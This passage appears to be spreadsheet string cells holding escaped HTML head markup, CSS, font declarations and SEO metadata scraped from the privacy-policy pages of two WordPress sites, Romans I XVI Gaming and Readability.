 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjovoSmb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 600;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoUoOmb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 700;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoa4Omb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 800;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoDIOmb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Roboto Slab';
 font-style: normal;
 font-weight: 900;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/robotoslab/v16/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoJYOmb2Rm.ttf) format('truetype');
}
@font-face {
 font-family: 'Share';
 font-style: normal;
 font-weight: 700;
 font-display: swap;
 src: url(https://fonts.gstatic.com/s/share/v11/i7dJIFliZjKNF63xM665UEY.ttf) format('truetype');
} &lt;/style&gt;&lt;link rel="preload" as="font" href="http://romansixvigaming.com/wp-content/themes/xion-progression/inc/fonts/font-awesome/webfonts/fa-brands-400.woff2" crossorigin/&gt;&lt;link rel="preload" as="font" href="http://romansixvigaming.com/wp-content/themes/xion-progression/inc/fonts/font-awesome/webfonts/fa-solid-900.woff2" crossorigin/&gt;&lt;link rel="preload" as="font" href="http://romansixvigaming.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-solid-900.woff2" crossorigin/&gt;&lt;link rel="preload" as="font" href="http://romansixvigaming.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2" crossorigin/&gt;&lt;link rel="preload" as="font" href="https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.woff2" crossorigin/&gt;&lt;link rel="preload" as="font" href="https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.woff2" crossorigin/&gt;&lt;link rel="canonical" href="https://romansixvigaming.com/privacy-policy/" /&gt;&lt;meta property="og:locale" content="en_US" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:type" content="article" /&gt;&lt;meta property="og:title" content="Privacy Policy - Romans I XVI Gaming" /&gt;&lt;meta property="og:description" content="Who we are Romans I XVI Gaming, LLC is an independent game development studio.</t>
  </si>
  <si>
    <t>Data Collected Website &amp;#8211; This website does not collect any personally identifiable information. Rainbow Dash &amp;#8211; Rainbow Dash does not collect any personally identifiable information. Tiles &amp;#8211; Tiles does not collect any personally identifiable information.</t>
  </si>
  <si>
    <t>Snake &amp;#8211; Snake does not collect [&amp;hellip;]" /&gt;&lt;meta property="og:url" content="https://romansixvigaming.com/privacy-policy/" /&gt;&lt;meta property="og:site_name" content="Romans I XVI Gaming" /&gt;&lt;meta property="article:modified_time" content="2020-05-18T12:04:43+00:00" /&gt;&lt;meta name="twitter:card" content="summary_large_image" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="twitter:label1" content="Est. reading time" /&gt;&lt;meta name="twitter:data1" content="1 minute" /&gt; &lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://romansixvigaming.com/privacy-policy/","url":"https://romansixvigaming.com/privacy-policy/","name":"Privacy Policy - Romans I XVI Gaming","isPartOf":{"@id":"https://romansixvigaming.com/#website"},"datePublished":"2020-01-13T18:41:41+00:00","dateModified":"2020-05-18T12:04:43+00:00","breadcrumb":{"@id":"https://romansixvigaming.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://romansixvigaming.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://romansixvigaming.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://romansixvigaming.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://romansixvigaming.com/#website","url":"https://romansixvigaming.com/","name":"Romans</t>
  </si>
  <si>
    <t>I XVI Gaming","description":"","publisher":{"@id":"https://romansixvigaming.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://romansixvigaming.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://romansixvigaming.com/#organization","name":"Romans I XVI Gaming","url":"https://romansixvigaming.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://romansixvigaming.com/#/schema/logo/image/","url":"http://romansixvigaming.com/wp-content/uploads/2020/05/Logo.png","contentUrl":"http://romansixvigaming.com/wp-content/uploads/2020/05/Logo.png","width":800,"height":400,"caption":"Romans I XVI Gaming"},"image":{"@id":"https://romansixvigaming.com/#/schema/logo/image/"}}]}&lt;/script&gt; &lt;!-- / Yoast SEO plugin. --&gt;&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;&lt;link rel="alternate" type="application/rss+xml" title="Romans</t>
  </si>
  <si>
    <t>I XVI Gaming &amp;raquo; Feed" href="https://romansixvigaming.com/feed/" /&gt;&lt;link rel="alternate" type="application/rss+xml" title="Romans I XVI Gaming &amp;raquo; Comments Feed" href="https://romansixvigaming.com/comments/feed/" /&gt;&lt;link rel="alternate" type="application/rss+xml" title="Romans I XVI Gaming &amp;raquo; Privacy Policy Comments Feed" href="https://romansixvigaming.com/privacy-policy/feed/" /&gt; &lt;style type="text/css"&gt; img.wp-smiley,
img.emoji {
 display: inline !important;
 border: none !important;
 box-shadow: none !important;
 height: 1em !important;
 width: 1em !</t>
  </si>
  <si>
    <t>important;
 margin: 0 0.07em ! important;
 vertical-align: -0.1em !important;
 background: none !important;
 padding: 0 !important;
} &lt;/style&gt;&lt;link rel='stylesheet' id='wp-block-library-css' href='https://romansixvigaming.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://romansixvigaming.com/wp-includes/css/classic-themes.min.css'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t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;} &lt;/style&gt;&lt;link rel='stylesheet' id='contact-form-7-css' href='https://romansixvigaming.com/wp-content/plugins/contact-form-7/includes/css/contact-form-7.min.css' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='xion-progression-style-css' href='https://romansixvigaming.com/wp-content/themes/xion-progression/style.css' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='font-awesome-5-css' href='https://romansixvigaming.com/wp-content/themes/xion-progression/inc/fonts/font-awesome/css/font-awesome-5.min.css' type='text/css' media='all' /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel='stylesheet' id='progression-studios-custom-style-css' href='https://romansixvigaming.com/wp-content/themes/xion-progression/css/progression-studios-custom-style.min.css' type='text/css' media='all' /&gt; &lt;style id='progression-studios-custom-style-inline-css' type='text/css'&gt; body #page-title-overlay-image {background-image:url('http://austins5.sg-host.com/wp-content/uploads/2020/05/screenshot_2.jpg'); } 
 body #logo-pro img {
 width:150px;
 padding-top:5px;
 padding-bottom:0px;
 }  a {
 color:#5be592;
 }
 a:hover {
 color:#ffffff;
 }
 #xion-progression-header-top .sf-mega, header ul .sf-mega {margin-left:-600px; width:1200px;}
 body .elementor-section.elementor-section-boxed &gt; .elementor-container {max-width:1200px;}
 body.elementor-page.single-product  #content-pro .width-container-pro, .width-container-pro, .width-container-over-ride {  width:1200px; }
 body.elementor-page .width-container-over-ride {  width:1180px; } 
 header#masthead-pro { background-color:#1d1f22;
 } 
 body.progression-studios-header-sidebar-before #progression-inline-icons .progression-studios-social-icons, body.progression-studios-header-sidebar-before:before, header#masthead-pro { 
 background-repeat: no-repeat; background-position:center center; background-size: cover;
 }
 body {
 background-color:#03090d; 
 background-repeat: no-repeat; background-position:center center; background-size: cover; background-attachment: fixed;
 }
 #page-title-pro {
 background-color:#121517; 
 }
 #page-title-overlay-image {
 background-image:url(http://austins5.sg-host.com/wp-content/uploads/2020/05/page-title-default.jpg);
 background-repeat: no-repeat; background-position:center center; background-size: cover;
 } 
 body.single-post #page-title-overlay-image { 
 background-repeat: no-repeat; background-position:center center; background-size: cover;
 }
 #progression-studios-page-title-container {
 padding-top:180px;
 padding-bottom:180px;
 text-align:left;
 }
 #progression-studios-post-page-title {
 background-color:#121517;
 background-image:url(http://austins5.sg-host.com/wp-content/uploads/2020/05/page-title-default.jpg);
 background-repeat: no-repeat; background-position:center center; background-size: cover;
 padding-top:130px;
 padding-bottom:125px;
 }
 #progression-studios-post-page-title:before, #page-title-pro:before {
 background: -moz-linear-gradient(top, rgba(0,0,0,0) 0%, #03090d 100%);
 background: -webkit-linear-gradient(top, rgba(0,0,0,0) 0%,#03090d 100%);
 background: linear-gradient(to bottom, rgba(0,0,0,0) 0%, #03090d 100%);
 }
 body.single-post #page-title-pro:before {
 background: -moz-linear-gradient(top, rgba(3,9,13,0.2) 0%, #03090d 100%);
 background: -webkit-linear-gradient(top, rgba(3,9,13,0.2) 0%,#03090d 100%);
 background: linear-gradient(to bottom, rgba(3,9,13,0.2) 0%, #03090d 100%);
 }
 body.single-post #progression-studios-page-title-container {
 padding-top:180px;
 padding-bottom:180px;
 } 
 body.single-portfolio_xion #progression-studios-page-title-container {
 padding-top:350px;
 padding-bottom:25px;
 } 
 .sidebar h4.widget-title { background:#1d1f22; }
 .sidebar-item { background:#16171a; }
 .sidebar ul li { border-color:rgba(255,255,255,  0.07); }
 .sidebar-item.widget_search:after {
 color:#1d1f22;
 }
 .sidebar-item.widget_search .search-form input.search-field,
 .sidebar-item.widget_search {
 border-color:#1d1f22;
 background:#1d1f22;
 } 
 ul.progression-studios-header-social-icons li a {
 margin-top:33px;
 background:rgba(255,255,255,  0);
 color:#787e8a;
 }
 ul.progression-studios-header-social-icons li a i {
 position:relative;
 top:4px;
 }
 .progression_studios_force_light_navigation_color .progression-sticky-scrolled #progression-header-icons-inline-display ul.progression-studios-header-social-icons li a, 
 .progression_studios_force_dark_navigation_color .progression-sticky-scrolled #progression-header-icons-inline-display ul.progression-studios-header-social-icons li a {
 color:#787e8a;
 }
 .progression_studios_force_light_navigation_color .progression-sticky-scrolled #progression-header-icons-inline-display ul.progression-studios-header-social-icons li a:hover, 
 .progression_studios_force_dark_navigation_color .progression-sticky-scrolled #progression-header-icons-inline-display ul.progression-studios-header-social-icons li a:hover {
 color:#ffffff;
 }
 #xion-progression-header-top ul.progression-studios-header-social-icons li a {
 background:rgba(255,255,255,  0);
 color:#787e8a;
 }
 #xion-progression-header-top ul.progression-studios-header-social-icons li a:hover,
 ul.progression-studios-header-social-icons li a:hover {
 background:rgba(255,255,255,  0);
 color:#ffffff;
 }
 /* START BLOG STYLES */ 
 #page-title-pro.page-title-pro-post-page { 
 background-repeat: no-repeat; background-position:center center; background-size: cover;
 }
 .progression-studios-feaured-image,
 .comment-body,
 .tags-progression-studios,
 .progression-blog-content {
 border-color:#232930;
 }
 .comment-body:before {
 border-right-color:#232930;
 }
 ul.progression-post-meta li a,
 h2.progression-blog-title a {color:#ffffff;} 
 ul.progression-post-meta li a:hover,
 h2.progression-blog-title a:hover, .progression-blog-content a.more-link {color:#5be592;}
 .progression-blog-content a.more-link:hover {
 border-color:#5be592;
 }
 /*</t>
  </si>
  <si>
    <t>END BLOG STYLES */
 /* START PORTFOLIO STYLES */
 .progression-portfolio-content,
 .progression-studios-portfolio-feaured-image {
 border-color:#232930;
 }
 /* END PORTFOLIO STYLES */
 /* START SHOP STYLES */
 #progression-studios-woocommerce-single-bottom .related.products {
 display:none;
 }
 .related.products h6 {
 display:block;
 }
 #content-pro ul.products h2.woocommerce-loop-category__title mark {
 display:none;
 }
 #progression-studios-woocommerce-single-bottom .woocommerce-tabs ul.wc-tabs li.active a {
 color:#ffffff;
 }
 .progression-studios-shop-index-text {
 border-color:#232930;
 background:#03090d;
 }
 #progression-studios-woocommerce-single-bottom .woocommerce-tabs ul.wc-tabs li.active {
 border-bottom-color:#ffffff;
 }
 #progression-studios-woocommerce-single-bottom .woocommerce-tabs ul.wc-tabs li.active,
 #progression-studios-woocommerce-single-bottom {
 background:#03090d;
 }
 /* END SHOP STYLES */
 /* START BUTTON STYLES */
 #content-pro .woocommerce table.shop_table .coupon input#coupon_code, #content-pro .woocommerce table.shop_table input, form.checkout.woocommerce-checkout textarea.input-text, form.checkout.woocommerce-checkout input.input-text,
 .post-password-form input, .search-form input.search-field, .wpcf7</t>
  </si>
  <si>
    <t>select, #respond textarea, #respond input, .wpcf7-form input, .wpcf7-form textarea {
 background-color:rgba(255,255,255,  0);
 border-color:#cdcece;
 }
 .progression-studios-shop-overlay-buttons a.added_to_cart, .wp-block-button a.wp-block-button__link, .post-password-form input[type=submit], #respond input.submit, .wpcf7-form input.wpcf7-submit,
 .infinite-nav-pro a, #boxed-layout-pro .woocommerce .shop_table input.button, #boxed-layout-pro .form-submit input#submit, #boxed-layout-pro #customer_login input.button, #boxed-layout-pro .woocommerce-checkout-payment input.button, #boxed-layout-pro button.button, #boxed-layout-pro a.button  {
 font-size:13px;
 }
 .search-form input.search-field,
 .wpcf7 select, .post-password-form input, #respond textarea, #respond input, .wpcf7-form input, .wpcf7-form textarea {
 border-radius:0px;
 }
 #helpmeeout-login-form:before {
 border-bottom: 8px solid #5be492;
 }
 .wp-block-button.is-style-outline a.wp-block-button__link {
 border-color: #5be492;
 color: #5be492;
 }
 body .wpd-av {
 border-color: #ffffff; 
 }
 body .wpd-av button.yes {
 background-color: #ffffff;
 color: #2b734a;
 }
 .tags-progression-studios a:hover,
 body .wpd</t>
  </si>
  <si>
    <t>-av button.yes:hover {
 background-color: #5be492;
 color: #2b734a;
 }
 .wp-block-button.is-style-outline a.wp-block-button__link:hover {
 background: #5be492;
 }
 ul.portfolio-category-single li a,
 ul.portfolio-category-index li a,
 .blog-meta-category-list a:hover, .blog-single-category-display a:hover,
 .progression-page-nav a:hover, .progression-page-nav span, #content-pro ul.page-numbers li a:hover, #content-pro ul.page-numbers li span.current {
 color:#2b734a;
 background:#5be492;
 }
 .progression-page-nav a:hover span {
 color:#2b734a;
 }
 .flex-direction-nav a:hover, #boxed-layout-pro .woocommerce-shop-single .summary button.button,
 #boxed-layout-pro .woocommerce-shop-single .summary a.button {
 color:#2b734a;
 background:#5be492;
 }
 .progression-sticky-scrolled header#masthead-pro #progression-checkout-basket a.cart-button-header-cart, #progression-checkout-basket a.cart-button-header-cart, .progression-studios-shop-overlay-buttons a.added_to_cart, .infinite-nav-pro a, .wp-block-button a.wp-block-button__link, .woocommerce form input.button, .woocommerce form input.woocommerce-Button, button.wpneo_donate_button, .sidebar ul.progression-studios-social-widget li a, body .woocommerce nav.woocommerce-MyAccount-navigation li.is-active a, .post-password-form input[type=submit], #respond input.submit, .wpcf7-form input.wpcf7-submit, #boxed-layout-pro .woocommerce .shop_table input.button, #boxed-layout-pro .form-submit input#submit, #boxed-layout-pro #customer_login input.button, #boxed-layout-pro .woocommerce-checkout-payment input.button, #boxed-layout-pro button.button, #boxed-layout-pro a.button {
 color:#2b734a;
 background:#5be492;
 border-radius:3px;
 letter-spacing:0.04em;
 }
 .tagcloud a {
 border-radius:3px;
 }
 .mc4wp-form input[type='submit']:hover,
 .tagcloud a {
 color:#2b734a;
 background:#5be492;
 }
 .mobile-menu-icon-pro span.progression-mobile-menu-text,
 #boxed-layout-pro .woocommerce-shop-single .summary button.button,
 #boxed-layout-pro .woocommerce-shop-single .summary a.button {
 letter-spacing:0.04em;
 }
 body .woocommerce nav.woocommerce-MyAccount-navigation li.is-active a { border-radius:0px; }
 #respond select:focus,
 body #content-pro .width-container-pro .woocommerce textarea:focus, body #content-pro .width-container-pro .woocommerce .shop_table input#coupon_code:focus[type=text], body #content-pro .width-container-pro .woocommerce input:focus[type=text], body #content-pro .width-container-pro .woocommerce input:focus[type=password], body #content-pro .width-container-pro .woocommerce input:focus[type=url], body #content-pro .width-container-pro .woocommerce input:focus[type=tel],body #content-pro .width-container-pro .woocommerce input:focus[type=number], 	body #content-pro .width-container-pro .woocommerce input:focus[type=color], body #content-pro .width-container-pro .woocommerce input:focus[type=email],
 #progression-studios-woocommerce-single-top table.variations td.value select:focus,
 .woocommerce-page form.woocommerce-ordering select:focus,
 #panel-search-progression .search-form input.search-field:focus, body .woocommerce-shop-single table.variations td.value select:focus,  form#mc-embedded-subscribe-form  .mc-field-group input:focus, .wpcf7-form select:focus, .post-password-form input:focus, .search-form input.search-field:focus, #respond textarea:focus, #respond input:focus, .wpcf7-form input:focus, .wpcf7-form textarea:focus,
 .widget.widget_price_f</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
	&lt;!-- This site is optimized with the Yoast SEO plugin v20.5 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - Readability&lt;/title&gt;
	&lt;link rel="canonical" href="https://www.readabilitytutor.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - Readability" /&gt;
	&lt;meta property="og:description" content="Privacy Policy Last Updated: January 3, 2020 Home &amp;gt; Privacy Policy This Privacy Policy discloses our privacy practices and the possible uses of the information that we gather via www.ReadabilityTutor.com, Readability Mobile Apps, and via other submissions by you to Readability (together, the &amp;#8220;Site and Services&amp;#8221;). By using the Site and Services you consent to ...</t>
  </si>
  <si>
    <t>Read more" /&gt;
	&lt;meta property="og:url" content="https://www.readabilitytutor.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Readability" /&gt;
	&lt;meta property="article:modified_time" content="2022-10-10T07:17:56+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="13 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://www.readabilitytutor.com/privacy-policy/","url":"https://www.readabilitytutor.com/privacy-policy/","name":"Privacy Policy - Readability","isPartOf":{"@id":"https://www.readabilitytutor.com/#website"},"datePublished":"2022-09-19T09:54:43+00:00","dateModified":"2022-10-10T07:17:56+00:00","breadcrumb":{"@id":"https://www.readabilitytutor.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.readabilitytutor.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://www.readabilitytutor.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.readabilitytutor.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://www.readabilitytutor.com/#website","url":"https://www.readabilitytutor.com/","name":"Readability","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.readabilitytutor.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO plugin.</t>
  </si>
  <si>
    <t>--&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Readability &amp;raquo ; Feed" href="https://www.readabilitytutor.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Readability &amp;raquo; Comments Feed" href="https://www.readabilitytutor.com/comments/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Readability &amp;raquo; Privacy Policy Comments Feed" href="https://www.readabilitytutor.com/privacy-policy/feed/" /&gt;
&lt;script&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.readabilitytutor.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};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t>
  </si>
  <si>
    <t>o.length;r++)t.supports[o[r]]=function(e){if(p&amp;&amp;p.fillText)switch(p.textBaseline="top",p.font="600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[129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}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&lt;style&gt;
img.wp-smiley,
img.emoji {
	display: inline !</t>
  </si>
  <si>
    <t>important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em ! important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='fl-builder-layout-5748-css' href='https://www.readabilitytutor.com/wp-content/uploads/bb-plugin/cache/5748-layout.css?ver=453b6c2f199057f982a0110b4a21d41b' media='all' /&gt;
&lt;link rel='stylesheet' id='contact-form-7-css' href='https://www.readabilitytutor.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1' media='all' /&gt;
&lt;link rel='stylesheet' id='rt-fontawsome-css' href='https://www.readabilitytutor.com/wp-content/plugins/the-post-grid/assets/vendor/font-awesome/css/font-awesome.min.css?ver=7.0.2' media='all' /&gt;
&lt;link rel='stylesheet' id='rt-tpg-css' href='https://www.readabilitytutor.com/wp-content/plugins/the-post-grid/assets/css/thepostgrid.min.css?ver=7.0.2' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-5-css' href='https://www.readabilitytutor.com/wp-content/plugins/bb-plugin/fonts/fontawesome/5.15.1/css/all.min.css?ver=2.4.1' media='all' /&gt;
&lt;link rel='stylesheet' id='fl-builder-layout-bundle-0a350cb0dfd39b2eb4e7e551fd5a4b68-css' href='https://www.readabilitytutor.com/wp-content/uploads/bb-plugin/cache/0a350cb0dfd39b2eb4e7e551fd5a4b68-layout-bundle.css?ver=2.4.1-1.3.2.3' media='all' /&gt;
&lt;link rel='stylesheet' id='generate-comments-css' href='https://www.readabilitytutor.com/wp-content/themes/generatepress/assets/css/components/comments.min.css?ver=3.3.0' media='all' /&gt;
&lt;link rel='stylesheet' id='generate-style-css' href='https://www.readabilitytutor.com/wp-content/themes/generatepress/assets/css/main.min.css?ver=3.3.0' media='all' /&gt;
&lt;style id='generate-style-inline-css'&gt;
body{background-color:var(--base-2);color:var(--contrast);}a{color:var(--accent);}a{text-decoration:underline;}.entry-title a, .site-branding a, a.button, .wp-block-button__link, .main-navigation a{text-decoration:none;}a:hover, a:focus, a:active{color:var(--contrast);}.wp-block-group__inner-container{max-width:1200px;margin-left:auto;margin-right:auto;}:root{--contrast:#222222;--contrast-2:#575760;--contrast-3:#b2b2be;--base:#f0f0f0;--base-2:#f7f8f9;--base-3:#ffffff;--accent:#1e73be;}:root .has-contrast-color{color:var(--contrast);}:root .has-contrast-background-color{background-color:var(--contrast);}:root .has-contrast-2-color{color:var(--contrast-2);}:root .has-contrast-2-background-color{background-color:var(--contrast-2);}:root .has-contrast-3-color{color:var(--contrast-3);}:root .has-contrast-3-background-color{background-color:var(--contrast-3);}:root .has-base-color{color:var(--base);}:root .has-base-background-color{background-color:var(--base);}:root .has-base-2-color{color:var(--base-2);}:root .has-base-2-background-color{background-color:var(--base-2);}:root .has-base-3-color{color:var(--base-3);}:root .has-base-3-background-color{background-color:var(--base-3);}:root .has-accent-color{color:var(--accent);}:root .has-accent-background-color{background-color:var(--accent);}.top-bar{background-color:#636363;color:#ffffff;}.top-bar a{color:#ffffff;}.top-bar a:hover{color:#303030;}.site-header{background-color:var(--base-3);}.main-title a,.main-title a:hover{color:var(--contrast);}.site-description{color:var(--contrast-2);}.mobile-menu-control-wrapper .menu-toggle,.mobile-menu-control-wrapper .menu-toggle:hover,.mobile-menu-control-wrapper .menu-toggle:focus,.has-inline-mobile-toggle #site-navigation.toggled{background-color:rgba(0, 0, 0, 0.02);}.main-navigation,.main-navigation ul ul{background-color:var(--base-3);}.main-navigation .main-nav ul li a, .main-navigation .menu-toggle, .main-navigation .menu-bar-items{color:var(--contrast);}.main-navigation .main-nav ul li:not([class*="current-menu-"]):hover &gt; a, .main-navigation .main-nav ul li:not([class*="current-menu-"]):focus &gt; a, .main-navigation .main-nav ul li.sfHover:not([class*="current-menu-"]) &gt; a, .main-navigation .menu-bar-item:hover &gt; a, .main-navigation .menu-bar-item.sfHover &gt; a{color:var(--accent);}button.menu-toggle:hover,button.menu-toggle:focus{color:var(--contrast);}.main-navigation .main-nav ul li[class*="current-menu-"] &gt; a{color:var(--accent);}.navigation-search input[type="search"],.navigation-search input[type="search"]:active, .navigation-search input[type="search"]:focus, .main-navigation .main-nav ul li.search-item.active &gt; a, .main-navigation .menu-bar-items .search-item.active &gt; a{color:var(--accent);}.main-navigation ul ul{background-color:var(--base);}.separate-containers .inside-article, .separate-containers .comments-area, .separate-containers .page-header, .one-container .container, .separate-containers .paging-navigation, .inside-page-header{background-color:var(--base-3);}.entry-title a{color:var(--contrast);}.entry-title a:hover{color:var(--contrast-2);}.entry-meta{color:var(--contrast-2);}.sidebar .widget{background-color:var(--base-3);}.footer-widgets{background-color:var(--base-3);}.site-info{background-color:var(--base-3);}input[type="text"],input[type="email"],input[type="url"],input[type="password"],input[type="search"],input[type="tel"],input[type="number"],textarea,select{color:var(--contrast);background-color:var(--base-2);border-color:var(--base);}input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="search"]:focus,input[type="tel"]:focus,input[type="number"]:focus,textarea:focus,select:focus{color:var(--contrast);background-color:var(--base-2);border-color:var(--contrast-3);}button,html input[type="button"],input[type="reset"],input[type="submit"],a.button,a.wp-block-button__link:not(.has-background){color:#ffffff;background-color:#55555e;}button:hover,html input[type="button"]:hover,input[type="reset"]:hover,input[type="submit"]:hover,a.button:hover,button:focus,html input[type="button"]:focus,input[type="reset"]:focus,input[type="submit"]:focus,a.button:focus,a.wp-block-button__link:not(.has-background):active,a.wp-block-button__link:not(.has-background):focus,a.wp-block-button__link:not(.has-background):hover{color:#ffffff;background-color:#3f4047;}a.generate-back-to-top{background-color:rgba( 0,0,0,0.4 );color:#ffffff;}a.generate-back-to-top:hover,a.generate-back-to-top:focus{background-color:rgba( 0,0,0,0.6 );color:#ffffff;}:root{--gp-search-modal-bg-color:var(--base-3);--gp-search-modal-text-color:var(--contrast);--gp-search-modal-overlay-bg-color:rgba(0,0,0,0.2);}@media (max-width:768px){.main-navigation .menu-bar-item:hover &gt;</t>
  </si>
  <si>
    <t>a, .main-navigation .menu-bar-item.sfHover &gt; a{background:none;color:var(--contrast);}}.nav-below-header .main-navigation .inside-navigation.grid-container, .nav-above-header .main-navigation .inside-navigation.grid-container{padding:0px 20px 0px 20px;}.site-main .wp-block-group__inner-container{padding:40px;}.separate-containers .paging-navigation{padding-top:20px;padding-bottom:20px;}.entry-content .alignwide, body:not(.no-sidebar) .entry-content .alignfull{margin-left:-40px;width:calc(100% + 80px);max-width:calc(100% + 80px);}.rtl .menu-item-has-children .dropdown-menu-toggle{padding-left:20px;}.rtl .main-navigation .main-nav ul li.menu-item-has-children &gt; a{padding-right:20px;}@media (max-width:768px){.separate-containers .inside-article, .separate-containers .comments-area, .separate-containers .page-header, .separate-containers .paging-navigation, .one-container .site-content, .inside-page-header{padding:30px;}.site-main .wp-block-group__inner-container{padding:30px;}.inside-top-bar{padding-right:30px;padding-left:30px;}.inside-header{padding-right:30px;padding-left:30px;}.widget-area .widget{padding-top:30px;padding-right:30px;padding-bottom:30px;padding-left:30px;}.footer-widgets-container{padding-top:30px;padding-right:30px;padding-bottom:30px;padding-left:30px;}.inside-site-info{padding-right:30px;padding-left:30px;}.entry-content .alignwide, body:not(.no-sidebar) .entry-content .alignfull{margin-left:-30px;width:calc(100% + 60px);max-width:calc(100%</t>
  </si>
  <si>
    <t>+ 60px);}.one-container .site-main .paging-navigation{margin-bottom:20px;}}/* End cached CSS */.is-right-sidebar{width:30%;}.is-left-sidebar{width:30%;}.site-content .content-area{width:100%;}@media (max-width:768px){.main-navigation .menu-toggle,.sidebar-nav-mobile:not(#sticky-placeholder){display:block;}.main-navigation ul,.gen-sidebar-nav,.main-navigation:not(.slideout-navigation):not(.toggled) .main-nav &gt; ul,.has-inline-mobile-toggle #site-navigation .inside-navigation &gt; *:not(.navigation-search):not(.main-nav){display:none;}.nav-align-right .inside-navigation,.nav-align-center .inside-navigation{justify-content:space-between;}.has-inline-mobile-toggle .mobile-menu-control-wrapper{display:flex;flex-wrap:wrap;}.has-inline-mobile-toggle .inside-header{flex-direction:row;text-align:left;flex-wrap:wrap;}.has-inline-mobile-toggle .header-widget,.has-inline-mobile-toggle #site-navigation{flex-basis:100%;}.nav-float-left .has-inline-mobile-toggle #site-navigation{order:10;}}
&lt;/style&gt;
